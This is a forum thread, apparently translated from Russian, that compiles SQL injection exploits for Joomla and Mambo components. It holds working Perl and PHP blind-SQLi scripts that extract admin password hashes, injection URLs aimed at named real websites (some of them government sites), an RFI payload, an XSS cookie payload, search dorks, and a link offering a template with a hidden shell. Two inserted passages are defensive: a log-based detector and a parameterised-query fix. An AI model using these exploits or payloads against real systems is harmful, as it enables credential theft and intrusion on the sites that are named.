Joomla Component com_jumi (fileid) Blind SQL Injection Exploit

------------------------------------------------------------------------------
Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------

#####################################################
# [+] Author : Chip D3 Bi0s #
# [+] Email : chipdebios[alt+64]gmail.com #
# [+] Vulnerability : Blind SQL injection #
#####################################################

Example:
Code:
http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>

n=number fileid valid

<Sql code>:
Code:
'+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
/index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...

DEMO LIVE:
Code:
http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/*
etc, etc....

+++++++++++++++++++++++++++++++++++++++
#[!] 
Produced in South America +++++++++++++++++++++++++++++++++++++++ if you want to save the work, you can use the following script ------------------------------- PHP: #!/usr/bin/perl -w use LWP::UserAgent; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection \n\n"; print "\t\t-----------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path: "; chomp(my $target=<STDIN>); print " [-] Introduce fileid: "; chomp($z=<STDIN>); print " [+] Password: "; $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter { #c referido a ascci 48-57, 97-102 for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } for ($c=97;$c<=102;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } } # milw0rm.com [2009-06-15]
Joomla Component com_ijoomla_rss Blind SQL Injection Exploit Code: #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; print " o Joomla Component com_ijoomla_rss Blind SQL Injection Exploit o\n"; print " o Author:xoron o\n"; print " o More info:http://joomla15.ijoomlademo.com o\n"; print " o vendor:http://ijoomlademo.com o\n"; print " o Dork : com_ijoomla_rss o\n"; print " o Usage: perl bachir.pl host path <options> o\n"; print " o Example: perl bachir.pl www.host.com /joomla/ -s 2 o\n"; print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $sid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "s=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"s"}) { $sid = $options{"s"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $sid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $sid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $sid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")"; my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "seminar_boxA"; if($content =~ /$regexp/) { return 1; } else { return 0; } } # milw0rm.com [2009-06-15]
Joomla Component com_tickets <= 2.1 (id) SQL Injection Vuln

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_tickets (id) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt
[+] Vulnerability : SQL injection
###################################################

Info component:
---------------
Name : Tickets
Version : 0.1 & 2.1
Author : Paul Coogan
Author email : [email protected]
Web author : http://www.ideabuzz.com
###################################################

Code:
Example: http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]
n = id valid

Demo Live Joomla : version 2.1
------------------------------
Code:
http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/*

Demo Live Mambo : Version 0.1
-----------------------------
Code:
http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/*

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-06-22]
com_svmap

I stumbled on this by accident. Maybe someone can take it further, if there is anything to take further, of course.
Code:
www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
SQL injection in the doQment component for Joomla

Vulnerability: the vulnerable parameter is cid=

Example:
Code:
http://www.agmodena.it/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users/**/where/**/usertype=CHAR(83,117,112,101,114,32,65,100,109,105 ,110,105,115,116,114,97,116,111,114)#&Itemid=92

Dork: inurl:com_doqment + cid=

# shell_c0de
Joomla Almond Classifieds Component SQL Injection and Cross-Site Scripting

Description:
Moudi has reported some vulnerabilities in the Almond Classifieds component for Joomla, which can be exploited by malicious people to conduct SQL injection and cross-site scripting attacks.

1) Input passed via the "replid" to index.php (when "option" is set to "com_aclassf", "Itemid" is set to a valid id, "ct" to "manw_repl" and "md" is set to "add_form") is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2) Input passed via the "addr" parameter to components/com_aclassf/gmap.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerabilities are reported in version 7.5. Other versions may also be affected.

Code:
==============================================================================
[+] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[+] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
==============================================================================
[+] Script: [ Joomla Almond Classifieds v.7.5 ]
[+] Language: [ PHP ]
[+] Download: [ http://www.almondsoft.com ]
[+] Founder: [ Moudi <[email protected]> ]
[+] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[+] Team: [ EvilWay ]
[+] Dork: [ OFF ]
[+] Price: [ $195 ]
[+] Site : [ https://security-shell.ws/forum.php ]
###########################################################################

===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===

[+] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
[+] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE
[+] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE
[+] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5 => TRUE
[+] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5 => FALSE

===[ Exploit XSS + LIVE : vulnerability ]===

[+] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]
[+] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>

Author: Moudi
###########################################################################
Joomla component com_fireboard SQL-inj

Vulnerable parameter: func
Code:
?func=who',%20userid=123,%20link=(SELECT %20jos_users.password%20FROM%20jos_users%20WHERE%20jos_users.id=123)%20--%20a

For more detail, look here http://forum.antichat.ru/threadnav130926-1-10.html and here http://forum.antichat.ru/showpost.php?p=1409117&postcount=33
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : Blind SQL injection
###################################################

Example:
Code:
http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code]

n:valid Itemid

Sql code:
Code:
+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...

DEMO LIVE:
Code:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
Code:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97
!False ¡¡¡¡
Code:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98
¡True ¡¡¡¡
etc, etc...

# milw0rm.com [2009-08-01]
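Seen from the web server, the true/false probing shown above and the per-character loops in the scripts in this thread leave the same trail: one client repeating one SQL fragment inside a parameter that should be an integer, with only the numbers changing. The following is an added example, not part of the original posts, that finds such series in an access log; the log lines, addresses, function names and the threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Parameters injected in this thread; all are plain integers in normal traffic.
NUMERIC_PARAMS = {"fileid", "itemid", "id", "cid", "cat", "node", "replid", "idproyecto"}
SQL_TOKEN = re.compile(r"(?i)\b(select|union|substring|ascii|benchmark|concat(_ws)?)\b")


def tainted_params(target):
    """Return (path, option, name, value) for numeric parameters holding non-integers."""
    parts = urlsplit(target)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    option = dict(pairs).get("option", "")
    return [(parts.path, option, name.lower(), value)
            for name, value in pairs
            if name.lower() in NUMERIC_PARAMS
            and not re.fullmatch(r"-?\d*", value.strip())]


def find_blind_extraction(lines, min_probes=8):
    """Report clients sending many requests that differ only in their numbers.

    A blind extraction loop repeats one SQL fragment and changes only the
    character position and the compared code, so replacing every digit run
    with 'N' collapses the whole loop into a single template.
    """
    groups = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for path, option, name, value in tainted_params(m["target"]):
            if SQL_TOKEN.search(value):
                template = re.sub(r"\d+", "N", value.lower())
                groups[(m["client"], path, option, name, template)].add(value)
    return {key: len(vals) for key, vals in groups.items() if len(vals) >= min_probes}


def sample_log():
    """Constructed log lines (documentation address ranges), not captured traffic."""
    fmt = '{ip} - - [01/Aug/2009:10:00:{s:02d} +0000] "GET {url} HTTP/1.1" 200 5120'
    probe = ("/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+"
             "concat(password)+from+jos_users+limit+0,1),{pos},1))={code}")
    lines = [fmt.format(ip="198.51.100.7", s=0,
                        url="/index.php?option=com_jfusion&Itemid=66")]
    lines += [fmt.format(ip="203.0.113.5", s=pos * 10 + i,
                         url=probe.format(pos=pos, code=code))
              for pos in (1, 2) for i, code in enumerate(range(48, 54))]
    lines.append(fmt.format(ip="198.51.100.9", s=59,
                            url="/index.php?option=com_jumi&fileid=2x"))
    return lines


if __name__ == "__main__":
    for key, count in find_blind_extraction(sample_log()).items():
        print(count, "probes:", key)
```

The single malformed `fileid=2x` request is returned by `tainted_params` but does not form a series, which keeps one-off typos apart from an extraction run.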
http://wwww.host.org/Path : http://www.cd7.com.ec/ [-] Introduce Itemid : 66 [-] Introduce coincidencia : http://www.cd7.com.ec/forum/ +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ PHP: #!/usr/bin/perl -w use LWP::UserAgent; use Benchmark; my $t1 = new Benchmark; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jfusion (Itemid) Blind SQL-injection \n\n"; print "\t\t-------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path : ";chomp(my $target=<STDIN>); print " [-] Introduce Itemid : ";chomp($z=<STDIN>); print " [-] Introduce coincidencia : ";chomp($w=<STDIN>); $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); print "----------------Inyectando----------------\n"; #es Vulnerable? $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=1"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=2"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";} else {print " [-] Vulnerable :)\n"; for ($x=1;$x<=32;$x++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))>57"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}#para alininear 0..9 con los 10-32 if ($content =~ /$regexp/) { for ($c=97;$c<=102;$c++) { $host = $target . 
"/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." "; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;} } } else { for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." "; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;} } } } print " [+] Password :"." ".join('', @caracter) . "\n"; my $t2 = new Benchmark; my $tt = timediff($t2, $t1); print "El script tomo:",timestr($tt),"\n"; } } else {print " [-] Exploit Fallo :(\n";} # milw0rm.com [2009-08-01]
Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit PHP: <?php /* -------------------------- Joomla <=1.0.15 Component com_pms <=2.0.4 (Ignore-List) SQl-Injection Vuln -------------------------- Author: M4dhead Vulnerable joomla component : com_pms Conditions : magic_quotes_gpc = On or Off it doesn't matter ;) -------------------------- PREPARATION: -------------------------- You need a valid Account on the Joomla 1.0.15 Site + Community Builder Suite 1.1.0: Community Builder Suite 1.1.0: http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,1175.html PMS enhanced Version 2.0.4 J 1.0 http://www.make-website.de/script-downlaods?task=summary&cid=123&catid=214 Install Joomla 1.0.15 Install Community Builder Install PMS Enhanced Activate the Ignorlist in Components->PMS Enhanced->Config Tab: Backend -> Ingorlist: Yes Create a valid User on the target Joomla 1.0.15 System with Community Builder, login and copy the cookieinformation into the $cookie var below, adjust the User-Agent on your Post Header dependent on your Browser. Notice: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in, because the cookie-name is dependent on your browser. -------------------------- USAGE: -------------------------- Run this script! If there's not shown a page that prompt you to login, the attack was successful. Then go to the ignore list: www.yourtargetsite.com/index.php?option=com_pms&Itemid=&page=ignore and you will see some username and passwords in the selectbox :-) Have fun!! 
---------------------------------------------------- */ $host = "localhost"; //your target Joomla Site $cookie = "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e14367d5c7298f6c72c"; //replace this with your own cookie values $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n"; //NOTICE: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in, //because the cookie-name is dependent on your browser. //Don't change anything below $path = "/joomla/index.php?option=com_pms&Itemid=&page=ignore"; //dont change this $data_to_send = "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |"; //you don't have to change this print_r($post = PostToHost($host, $path, $cookie, $data_to_send, $useragent)); function PostToHost($host, $path, $cookie, $data_to_send, $useragent) { $fp = fsockopen($host, 80); fputs($fp, "POST $path HTTP/1.1\r\n"); fputs($fp, "Host: $host\r\n"); fputs($fp, "User-Agent: $useragent"); fputs($fp, "Cookie: $cookie\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: ". strlen($data_to_send) ."\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data_to_send); while(!feof($fp)) { $res .= fgets($fp, 128); } fclose($fp); return $res; } ?> # milw0rm.com [2009-08-07]
COM_SOBI2 SQL INJECTION

http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.html

Tested only on Joomla_1.0.x
Code:
index.php?option=com_sobi2&sobi2Task=search&Itemid=26

benchmark: enter this in the search field
Code:
')and+benchmark(10000000,benchmark(10000000,md5(now())))# a

Be sure to remove all spaces, then click search)
Joomla/Mambo component vulnerabilities

Vulnerability: SQL-Inj
Component: The Publications
Vulnerability in the file publications.php

Vulnerable code:
PHP:
$query = "SELECT * FROM #__content WHERE catid=$id ORDER BY title DESC";

Example:
Code:
http://www.bscic.gov.bd/index.php?option=com_publications&Itemid=20&lang=en&id=6/**/and/**/1=0/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
SQL injection exploits for Joomla components

Seven exploits demonstrating SQL injection in add-on components for the popular content management system Joomla were published at once on PacketStorm, a website devoted to computer security.

The exploits concern the following components: com_speech, com_pressrelease, com_mediaalert, com_joomloc, com_lucygames, com_tpdugg and com_bfsurvey_profree.

Joomla Speech (exploit)
Joomla Press Release (exploit)
Joomla Media Alert (exploit)
Joomla Joomloc (exploit)
Joomla LucyGames (exploit)
Joomla TPDugg (exploit)
Joomla BF Survey Pro Free (exploit)
Vulnerability: SQL-Inj
Component: Jeporter
Version: 2.0
Vulnerability in the file jeporter.php

Vulnerable code:
PHP:
// $cid is taken from the request and concatenated below without an integer cast
$cid = mosGetParam( $_REQUEST, 'cid', false);
$sql = "SELECT * FROM #__jeporter WHERE id= ".$cid;
$database->setQuery( $sql );
$report = NULL;
$database->loadObject( $report );
$cid = $report->id;
$title = $report->title;
$jquery = $report->jquery;
$sql = "SELECT * FROM #__jeporter_fields WHERE jeportid= ".$cid;
$database->setQuery( $sql);
$rows = $database->loadObjectList();

Example:
Code:
http://www.nationalaidsstrategy.org/index.php?option=com_jeporter&task=showreport&cid=-4+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+jos_users--
Maybe someone will find this useful... A theme with a shell inside.. after the theme is installed, the shell will be at http://site.name/templates/jd_lagoon/ads.php

http://depositfiles.com/files/lhtkdh0m1
Vulnerability: Blind SQL-Inj
Component: com_clan_members
Version: 0.9.2.2b
Vulnerability in the file clan_members.html.php

Vulnerable code:
PHP:
$database->setQuery("SELECT * FROM #__clan_members WHERE id = $id" );
$member = $database -> loadAssocList();
$database->setQuery("SELECT * FROM #__users WHERE id = $id AND block = '0'" );
$usersdata = $database -> loadAssocList();
$database->setQuery("SELECT * FROM #__clan_members_squadperuser WHERE uid=$id" );
$rowsquadperuser = $database -> loadObjectList();
$database->setQuery("SELECT * FROM #__clan_members_comment WHERE memberid=$id" );
$rowmembercomment = $database -> loadObjectList();
$database->setQuery("SELECT * FROM #__clan_members_fields WHERE published=1 ORDER BY ordering" );
$rowmemberfields = $database -> loadObjectList();
#Check if the user is logged in into the side
$database->setQuery("SELECT count(distinct(userid)) as user_online FROM #__session WHERE guest=0 AND userid = $id");
$online = $database->loadResult();
foreach($rowsquadperuser as $squadperuser) {
    $database->setQuery("SELECT * FROM #__clan_members_squad WHERE published = '1' AND id = '$squadperuser->sid'" );
    $squadname = $database -> loadAssocList();
    if($squadname[0]["squadpicture"] != '' || $squadname[0]["squadname"] != '') {
        $squadpicture_array[$i+1] = $squadname[0]["squadpicture"];
        if($i == 0)
            $squadnames .= $squadname[0]["squadname"];
        else
            $squadnames .= ",".$squadname[0]["squadname"];
        $i++;
    }
}

Example:
true ->
Code:
http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=5&task=showClanMemberDetails
false ->
Code:
http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=4&task=showClanMemberDetails
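The vulnerable queries quoted in the posts above (publications.php, jeporter.php, clan_members.html.php) share one flaw: a request value is pasted, unquoted, into a numeric position of the SQL text, so quote escaping does not help and only integer validation or a bound parameter does. The following is an added example, not the components' code: Python with sqlite3 stands in for PHP and MySQL, and the table contents, function names and the SQLite spelling of the posted payload (`char(58)` in place of `0x3a`) are assumptions.

```python
import sqlite3

# The cid value from the Jeporter post, respelled for SQLite. Like the original,
# it contains no quote character at all.
PAYLOAD = "-4 union select 1,username||char(58)||password,3,4,5 from jos_users--"


def make_db():
    """In-memory stand-in for the tables named in the posts (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE jos_jeporter (id INTEGER, title TEXT, jquery TEXT, a TEXT, b TEXT);
        CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO jos_jeporter VALUES (4, 'Monthly report', 'SELECT 1', '', '');
        INSERT INTO jos_users VALUES (62, 'admin', 'constructed-hash-value');
    """)
    return db


def load_report_concat(db, cid):
    """Same shape as the quoted PHP: the request value becomes part of the SQL text."""
    return db.execute("SELECT * FROM jos_jeporter WHERE id = " + cid).fetchall()


def load_report_escaped(db, cid):
    """Quote escaping, as magic_quotes_gpc applied it, changes nothing here:
    the value sits in a numeric position and the payload needs no quote."""
    escaped = cid.replace("'", "''")
    return db.execute("SELECT * FROM jos_jeporter WHERE id = " + escaped).fetchall()


def load_report_fixed(db, cid):
    """Validate as an integer, then bind it; request data never reaches the SQL text."""
    try:
        report_id = int(cid)
    except ValueError:
        return []
    return db.execute("SELECT * FROM jos_jeporter WHERE id = ?", (report_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concat :", load_report_concat(db, PAYLOAD))
    print("escaped:", load_report_escaped(db, PAYLOAD))
    print("fixed  :", load_report_fixed(db, PAYLOAD))
```

In the quoted PHP the corresponding change is an integer cast such as `intval()` on the request value before it is placed in the string passed to `setQuery()`.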
Vulnerability: RFI
Component: UH_Events
Version: 0.99.0RC3a
Vulnerability in the file admin.uhevents.php
Requirements: register_globals & allow_url_fopen = On

Vulnerable code:
PHP:
require_once( $mosConfig_absolute_path."/administrator/components/$option/uhevents_config.php");

Exploit:
Code:
.../components/uh_events/admin.uhevents.php?mosConfig_absolute_path=http://shell?
Vulnerability: SQL
Component: Projects

Stumbled on it by accident)
Code:
?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

Example:
http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

In the same place:

Vulnerability: SQL
Component: com_nodes
Code:
?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal

http://www.inab.org/index.php?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal